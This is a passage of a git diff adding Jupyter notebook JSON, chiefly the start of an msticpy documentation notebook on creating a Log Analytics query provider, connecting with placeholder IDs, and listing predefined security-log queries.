+       "layout": "IPY_MODEL_9c4d084fb7a74bb3bc7fdf8dccc7e7d1",
+       "style": "IPY_MODEL_2e8cf80eb31f4d838fb45ff75ceadd24"
+      }
+     },
+     "fc2633ade3cd4bd3aa91761a21db9fe1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_66d6f1f9aacf406aa8e5222b4e95e897",
+       "style": "IPY_MODEL_bf13fcf0577a4563999273f2becb1a40",
+       "value": " in "
+      }
+     },
+     "fc40d426613c4c298b80596e4b386a8b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessId",
+        "NewProcessName",
+        "ParentProcessName",
+        "ProcessId",
+        "SourceComputerId",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "SubjectUserName",
+        "SubjectUserSid",
+        "TargetLogonId",
+        "TenantId",
+        "TimeCreatedUtc",
+        "TimeGenerated",
+        "TokenElevationType"
+       ],
+       "description": "Source: ",
+       "index": [],
+       "layout": "IPY_MODEL_6ff46ca9038444fb8984abd8082103fc",
+       "rows": 5,
+       "style": "IPY_MODEL_983445971b1748fa8e34c852d9c0ff1e"
+      }
+     },
+     "ffeb4d532469440bb9baa845061a1bf3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     }
+    },
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/Data_Queries.ipynb b/docs/notebooks/Data_Queries.ipynb
new file mode 100644
index 000000000..228993a06
--- /dev/null
+++ b/docs/notebooks/Data_Queries.ipynb
@@ -0,0 +1,2007 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Title: msticpy - Data\n",
+    "## Description:\n",
+    "This package provides functions to allow for the defining of data sources, connectors to them, and queries for them as well as the ability to call these elements to return query result from the defined data sources.\n",
+    "The package currently support connections to Log Analytics/Azure Sentinel/Azure Security Center, and the Microsoft Security Graph."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "The first step in using this package is to install the msticpy package."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Collecting git+https://github.com/microsoft/msticpy\n",
+      "Building wheels for collected packages: msticpy\n",
+      "  Building wheel for msticpy (setup.py): started\n",
+      "  Building wheel for msticpy (setup.py): finished with status 'done'\n",
+      "Successfully built msticpy\n",
+      "Installing collected packages: msticpy\n",
+      "Successfully installed msticpy-0.2.1\n"
+     ]
+    }
+   ],
+   "source": [
+    "%pip install --upgrade msticpy[azsentinel]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='contents'></a>\n",
+    "## Table of Contents\n",
+    "* [Instantiating a Query Provider](#instantiating)\n",
+    "* [Connecting to a Data Environment](#connecting)\n",
+    "* [Reviewing available queries](#review_queries)\n",
+    "* [Running a pre-defined query](#run_query)\n",
+    "* [Running an ad-hoc query](#run_adhoc)\n",
+    "* [Creating a new set of queries](#new)\n",
+    "* [Adding a new set of queries and running them](#add_new)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Imports Complete\n"
+     ]
+    }
+   ],
+   "source": [
+    "#Check we are running Python 3.6\n",
+    "import sys\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "if sys.version_info < MIN_REQ_PYTHON:\n",
+    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
+    "    print('or later is selected as the active kernel.')\n",
+    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
+    "\n",
+    "#imports\n",
+    "import yaml\n",
+    "import msticpy.nbtools as nbtools\n",
+    "\n",
+    "#data library imports\n",
+    "from msticpy.data.data_providers import QueryProvider\n",
+    "import msticpy.data.data_query_reader as QueryReader\n",
+    "from msticpy.data.param_extractor import extract_query_params\n",
+    "import msticpy.nbtools as mas\n",
+    "\n",
+    "print('Imports Complete')\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='instantiating'></a>\n",
+    "### Instantiating a Query Provider\n",
+    "In order to connect to and query a data source we need to define what sort of Data Environment we want to connect to and query (in this Notebook we will use Log Analytics as an example). To view the options available you can call <code>QueryProvider.list_data_environments()</code> which will return a list of all the available options.\n",
+    "\n",
+    "    \n",
+    "After selecting a Data Environment we can initialize our Query Provider by calling <code>QueryProvider(DATA_ENVIRONMENT)</code>. This will load the relavent driver for connecting to the data environment we have selected as well as provisioning a query store for us and adding queries from our default query directory. \n",
+    "\n",
+    "There are two other optional parameters we can pass when initializing our Query Providers to further customize it:\n",
+    "* We can also chose to initialize our Query Provider with a driver other than the defualt one with <code>QueryProvider(data_environment=DATA_ENVIRONMENT, driver=QUERY_DRIVER)</code>\n",
+    "* We can choose to import queries from a custom query directory (see - [Creating a new set of queries](#new) for more details) with <code>QueryProvider(data_environment=DATA_ENVIRONMENT, driver=QUERY_DRIVER, query_path=QUERY_DIRECTORY_PATH)</code>. \n",
+    "\n",
+    "For now we will simply create a Query Provider with default values.\n",
+    "\n",
+    "\n",
+    "    Query provider interface to queries.\n",
+    "\n",
+    "        Parameters\n",
+    "        ----------\n",
+    "        data_environment : Union[str, DataEnvironment]\n",
+    "            Name or Enum of environment for the QueryProvider\n",
+    "        driver : DriverBase, optional\n",
+    "            Override the built-in driver (query execution class)\n",
+    "            and use your own driver (must inherit from\n",
+    "            `DriverBase`)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "['LogAnalytics', 'Kusto', 'AzureSecurityCenter', 'SecurityGraph']\n",
+      "Please wait. Loading Kqlmagic extension...\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<html>\n",
+       "            <head>\n",
+       "            <style>\n",
+       "            .kql-magic-banner {\n",
+       "                display: flex; \n",
+       "                background-color: #d9edf7;\n",
+       "            }\n",
+       "            .kql-magic-banner > div {\n",
+       "                margin: 10px; \n",
+       "                padding: 20px; \n",
+       "                color: #3a87ad; \n",
+       "                font-size: 13px;\n",
+       "            }\n",
+       "            </style>\n",
+       "            </head>\n",
+       "            <body>\n",
+       "                <div class='kql-magic-banner'>\n",
+       "                    <div><img src='data:image/png;base64,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'></div>\n",
+       "                    <div>\n",
+       "                        <p>Kql Query Language, aka kql, is the query language for advanced analytics on Azure Monitor resources. The current supported data sources are \n",
+       "                        Azure Data Explorer (Kusto), Log Analytics and Application Insights. To get more information execute '%kql --help \"kql\"'</p>\n",
+       "                        <p>   &bull; kql reference: Click on 'Help' tab > and Select 'kql reference' or execute '%kql --help \"kql\"'<br>\n",
+       "                          &bull; Kqlmagic configuration: execute '%config Kqlmagic'<br>\n",
+       "                          &bull; Kqlmagic usage: execute '%kql --usage'<br>\n",
+       "                    </div>\n",
+       "                </div>\n",
+       "            </body>\n",
+       "            </html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<html>\n",
+       "        <head>\n",
+       "        \n",
+       "        </head>\n",
+       "        <body>\n",
+       "        <div><p style='padding: 10px; color: #3a87ad; background-color: #d9edf7; border-color: #bce9f1'>Kqlmagic&nbsppackage&nbspis&nbspupdated&nbspfrequently.&nbspRun&nbsp&apos;!pip&nbspinstall&nbspKqlmagic&nbsp--no-cache-dir&nbsp--upgrade&apos;&nbspto&nbspuse&nbspthe&nbsplatest&nbspversion.<br>Kqlmagic&nbspversion:&nbsp0.1.100,&nbspsource:&nbsphttps://github.com/Microsoft/jupyter-Kqlmagic</p></div>\n",
+       "        </body>\n",
+       "        </html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.reconnect();} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "data_environments = QueryProvider.list_data_environments()\n",
+    "print(data_environments)\n",
+    "qry_prov = QueryProvider(data_environment='LogAnalytics')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='connecting'></a>\n",
+    "### Connecting to a Data Environment\n",
+    "Once we have instantiated the query provider and loaded the relevent driver we can connect to the Data Environment. This is done by calling the <code>connect()</code> function of the Query Provider we just initialized and passing it a connection string to use.\n",
+    "\n",
+    "For Log Analytics/Azure Sentinel the connection string is in the format of <code>loganalytics://code().tenant(\"TENANT_ID\").workspace(\"WORKSPACE_ID\")</code>. Other Data Environments will have different connection string formats.\n",
+    "\n",
+    "    connect(self, connection_str: str, **kwargs):\n",
+    "       \n",
+    "        Connect to data source.\n",
+    "\n",
+    "        Parameters\n",
+    "        ----------\n",
+    "        connection_string : str\n",
+    "            Connection string for the data source"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdin",
+     "output_type": "stream",
+     "text": [
+      "Workspace ID xxxxxxxxxxxxxxxxxxxxxxxxxxx\n",
+      "Tenant ID xxxxxxxxxxxxxxxxxxxxxxxxxxx\n"
+     ]
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "                <html><body>\n",
+       "\n",
+       "                <!-- h1 id=\"user_code_p\"><b>BTYMGY4BP</b><br></h1-->\n",
+       "\n",
+       "                <input  id=\"kql_MagicCodeAuthInput\" type=\"text\" readonly style=\"font-weight: bold; border: none;\" size = '9' value='BTYMGY4BP'>\n",
+       "\n",
+       "                <button id='kql_MagicCodeAuth_button', onclick=\"this.style.visibility='hidden';kql_MagicCodeAuthFunction()\">Copy code to clipboard and authenticate</button>\n",
+       "\n",
+       "                <script>\n",
+       "                var kql_MagicUserCodeAuthWindow = null\n",
+       "                function kql_MagicCodeAuthFunction() {\n",
+       "                    /* Get the text field */\n",
+       "                    var copyText = document.getElementById(\"kql_MagicCodeAuthInput\");\n",
+       "\n",
+       "                    /* Select the text field */\n",
+       "                    copyText.select();\n",
+       "\n",
+       "                    /* Copy the text inside the text field */\n",
+       "                    document.execCommand(\"copy\");\n",
+       "\n",
+       "                    /* Alert the copied text */\n",
+       "                    // alert(\"Copied the text: \" + copyText.value);\n",
+       "\n",
+       "                    var w = screen.width / 2;\n",
+       "                    var h = screen.height / 2;\n",
+       "                    params = 'width='+w+',height='+h\n",
+       "                    kql_MagicUserCodeAuthWindow = window.open('https://microsoft.com/devicelogin', 'kql_MagicUserCodeAuthWindow', params);\n",
+       "\n",
+       "                    // TODO: save selected cell index, so that the clear will be done on the lince cell\n",
+       "                }\n",
+       "                </script>\n",
+       "\n",
+       "                </body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "                    <html><body><script>\n",
+       "\n",
+       "                        // close authentication window\n",
+       "                        if (kql_MagicUserCodeAuthWindow && kql_MagicUserCodeAuthWindow.opener != null && !kql_MagicUserCodeAuthWindow.closed) {\n",
+       "                            kql_MagicUserCodeAuthWindow.close()\n",
+       "                        }\n",
+       "                        // TODO: make sure, you clear the right cell. BTW, not sure it is a must to do any clearing\n",
+       "\n",
+       "                        // clear output cell\n",
+       "                        Jupyter.notebook.clear_output(Jupyter.notebook.get_selected_index())\n",
+       "\n",
+       "                        // TODO: if in run all mode, move to last cell, otherwise move to next cell\n",
+       "                        // move to next cell\n",
+       "\n",
+       "                    </script></body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "            <html><body>\n",
+       "\n",
+       "            <button onclick=\"this.style.visibility='visible';kql_MagicLaunchWindowFunction('Kqlmagic_temp_files/_b1315f05-4a7a-45b4-811f-73e715f7c122_at_loganalytics_schema.html','fullscreen=no,directories=no,location=no,menubar=no,resizable=yes,scrollbars=yes,status=no,titlebar=no,toolbar=no,','_b1315f05_4a7a_45b4_811f_73e715f7c122_at_loganalytics_schema','')\">popup schema b1315f05-4a7a-45b4-811f-73e715f7c122@loganalytics</button>\n",
+       "\n",
+       "            <script>\n",
+       "\n",
+       "            function kql_MagicLaunchWindowFunction(file_path, window_params, window_name, notebooks_host) {\n",
+       "                var url;\n",
+       "                if (file_path.startsWith('http')) {\n",
+       "                    url = file_path;\n",
+       "                } else {\n",
+       "                    var base_url = '';\n",
+       "\n",
+       "                    // check if azure notebook\n",
+       "                    var azure_host = (notebooks_host == null || notebooks_host.length == 0) ? 'https://notebooks.azure.com' : notebooks_host;\n",
+       "                    var start = azure_host.search('//');\n",
+       "                    var azure_host_suffix = '.' + azure_host.substring(start+2);\n",
+       "\n",
+       "                    var loc = String(window.location);\n",
+       "                    var end = loc.search(azure_host_suffix);\n",
+       "                    start = loc.search('//');\n",
+       "                    if (start > 0 && end > 0) {\n",
+       "                        var parts = loc.substring(start+2, end).split('-');\n",
+       "                        if (parts.length == 2) {\n",
+       "                            var library = parts[0];\n",
+       "                            var user = parts[1];\n",
+       "                            base_url = azure_host + '/api/user/' +user+ '/library/' +library+ '/html/';\n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // check if local jupyter lab\n",
+       "                    if (base_url.length == 0) {\n",
+       "                        var configDataScipt  = document.getElementById('jupyter-config-data');\n",
+       "                        if (configDataScipt != null) {\n",
+       "                            var jupyterConfigData = JSON.parse(configDataScipt.textContent);\n",
+       "                            if (jupyterConfigData['appName'] == 'JupyterLab' && jupyterConfigData['serverRoot'] != null &&  jupyterConfigData['treeUrl'] != null) {\n",
+       "                                var basePath = 'C:/' + '/';\n",
+       "                                if (basePath.startsWith(jupyterConfigData['serverRoot'])) {\n",
+       "                                    base_url = '/files/' + basePath.substring(jupyterConfigData['serverRoot'].length+1);\n",
+       "                                }\n",
+       "                            } \n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // assume local jupyter notebook\n",
+       "                    if (base_url.length == 0) {\n",
+       "\n",
+       "                        var parts = loc.split('/');\n",
+       "                        parts.pop();\n",
+       "                        base_url = parts.join('/') + '/';\n",
+       "                    }\n",
+       "                    url = base_url + file_path;\n",
+       "                }\n",
+       "\n",
+       "                window.focus();\n",
+       "                var w = screen.width / 2;\n",
+       "                var h = screen.height / 2;\n",
+       "                params = 'width='+w+',height='+h;\n",
+       "                kql_Magic__b1315f05_4a7a_45b4_811f_73e715f7c122_at_loganalytics_schema = window.open(url, window_name, window_params + params);\n",
+       "            }\n",
+       "            </script>\n",
+       "\n",
+       "            </body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "ws_id = input('Workspace ID')\n",
+    "ten_id = input('Tenant ID')\n",
+    "la_connection_string = f'loganalytics://code().tenant(\"{ten_id}\").workspace(\"{ws_id}\")'\n",
+    "qry_prov.connect(connection_str=f'{la_connection_string}')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='review_queries'></a>\n",
+    "### Reviewing available queries\n",
+    "Upon connecting to the relevant Data Environment we need to look at what query options we have available to us. In order to do this we can call <code>QUERY_PROVIDER.list_queries().</code> This will return a generator with the names of all the queries in our store.\n",
+    "\n",
+    "The results returned show the data family the query belongs to and the name of the specific query.\n",
+    "\n",
+    "    list_queries(self):\n",
+    "        \n",
+    "        Return list of family.query in the store.\n",
+    "\n",
+    "        Returns\n",
+    "        -------\n",
+    "        Iterable[str]\n",
+    "            List of queries"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "LinuxSyslog.all_syslog\n",
+      "LinuxSyslog.cron_activity\n",
+      "LinuxSyslog.squid_activity\n",
+      "LinuxSyslog.sudo_activity\n",
+      "LinuxSyslog.user_group_activity\n",
+      "LinuxSyslog.user_logon\n",
+      "SecurityAlert.get_alert\n",
+      "SecurityAlert.list_alerts\n",
+      "SecurityAlert.list_alerts_counts\n",
+      "SecurityAlert.list_alerts_for_ip\n",
+      "SecurityAlert.list_related_alerts\n",
+      "WindowsSecurity.get_host_logon\n",
+      "WindowsSecurity.get_parent_process\n",
+      "WindowsSecurity.get_process_tree\n",
+      "WindowsSecurity.list_host_logon_failures\n",
+      "WindowsSecurity.list_host_logons\n",
+      "WindowsSecurity.list_host_processes\n",
+      "WindowsSecurity.list_hosts_matching_commandline\n",
+      "WindowsSecurity.list_matching_processes\n",
+      "WindowsSecurity.list_processes_in_session\n"
+     ]
+    }
+   ],
+   "source": [
+    "queries = qry_prov.list_queries()\n",
+    "for query in queries:\n",
+    "    print(query)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "To get further details on a specific query call <code>QUERY_PROVIDER.DATA_FAMILY.QUERY_NAME('?')</code> or <code>QUERY_PROVIDER.DATA_FAMILY.QUERY_NAME('help')</code>\n",
+    "\n",
+    "This will display:\n",
+    "- Query Name\n",
+    "- What Data Environment it is designed for\n",
+    "- Short description of what the query does\n",
+    "- What parameter the query can be passed\n",
+    "- The raw query that will be run"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "scrolled": true
+   },
+   "outputs": [
